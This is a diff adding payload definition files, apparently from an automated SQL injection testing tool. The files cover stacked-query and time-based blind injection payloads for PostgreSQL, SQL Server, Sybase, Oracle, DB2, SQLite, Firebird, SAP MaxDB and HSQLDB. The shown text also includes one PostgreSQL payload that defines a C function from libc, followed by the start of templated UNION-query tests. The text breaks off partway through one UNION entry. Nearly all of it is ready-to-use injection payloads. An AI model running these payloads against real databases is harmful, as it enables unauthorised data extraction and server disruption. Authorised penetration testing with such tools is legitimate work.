+        <request>
+            <payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&lt; 8.2</dbms_version>
+            <os>Linux</os>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&lt; 8.2</dbms_version>
+            <os>Linux</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries (comment)</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
+        <request>
+            <payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries (DECLARE)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
+        <request>
+            <payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_LOCK.SLEEP - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (USER_LOCK.SLEEP - comment)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 stacked queries (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 stacked queries (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+    
+    <test>
+        <title>Firebird stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB stacked queries (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB stacked queries (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+    
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 2.0 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 2.0 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+    <!-- TODO: if possible, add payload for Microsoft Access -->
+    <!-- End of stacked queries tests -->
+</root>
--- a/data/xml/payloads/time_blind.xml
+++ b/data/xml/payloads/time_blind.xml
--- a/data/xml/payloads/union_query.xml
+++ b/data/xml/payloads/union_query.xml
@@ -0,0 +1,742 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- UNION query tests -->
+    <test>
+        <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[CHAR]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>NULL</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[RANDNUM]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[CHAR]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>NULL</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[RANDNUM]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[CHAR]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>NULL</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[RANDNUM]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[CHAR]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>NULL</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[RANDNUM]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[CHAR]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>NULL</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[RANDNUM]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[CHAR]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+    <test>
+        <title>Generic UNION query (NULL) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>NULL</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[RANDNUM]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>1-10</columns>
